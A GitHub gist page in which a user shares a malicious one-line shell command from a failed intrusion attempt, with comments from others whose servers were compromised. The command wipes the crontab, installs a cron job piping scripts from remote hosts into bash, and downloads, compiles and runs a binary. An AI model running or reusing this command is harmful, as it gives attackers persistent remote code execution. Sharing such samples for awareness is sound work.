Skip to content

Instantly share code, notes, and snippets.

@ismasan
Created May 25, 2013 04:55
  • Star 10 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
@Batistleman
Copy link

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

@rogerthat
Copy link

my server was infected too, should I do a reinstall?

definetly

@Leglaw
Copy link

Leglaw commented May 29, 2013

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

@Netmisa
Copy link

Netmisa commented May 30, 2013

Ok, anyway we known now where the problem comes from.

@sorenwiz
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment